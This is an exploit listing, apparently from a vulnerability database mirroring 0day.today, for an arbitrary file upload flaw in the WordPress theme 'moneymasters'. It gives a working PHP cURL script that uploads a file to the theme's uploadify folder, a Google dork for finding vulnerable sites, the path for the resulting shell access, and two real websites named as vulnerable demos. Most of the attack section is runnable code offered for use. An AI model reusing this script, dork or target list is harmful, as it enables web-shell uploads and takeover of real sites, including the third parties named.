Lucene search
K

Wordpress Themes moneymasters Arbitrary File Upload Vulnerability

🗓️ 30 Dec 2012 00:00:00Reported by fayzounType 
zdt
 zdt
🔗 0day.today👁 20 Views

WordPress Themes moneymasters Arbitrary File Upload Vulnerabilit

Code
################################################## #####
# Author => Fayzoun
# Facebook => http://fb.me/fayzoun.no.love
# Facebook page => http://fb.me/fayzoun.AO
# Google Dork => inurl:/wp-content/themes/moneymasters 
# Mail : [email protected] / [email protected]
################################################## #
# Exploit:
<?php
 
$uploadfile="Fayzoun.php";
$ch = curl_init("http://www.vulnsite.com");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wp-content/themes/moneymasters/code/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
 
  print "$postResult";
?> 

Shell Access : http://localhost/wordpress/wp-content/themes/moneymasters/code/uploadify/random_name.php
-------------------
<?php
phpinfo();
?>
------------------------------
 
[#] Demos Vulnd sites :
 
http://themiza.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
http://www.vietbacsecurity.com/wp-content/themes/moneymasters/code/uploadify/uploadify.php
################################################## 
Gretz To : .:: شهداء الأقصى ::. - Pal Snipre - The Wolf - Salem Hassine 
Thanks To: God Allah

#  0day.today [2018-03-10]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation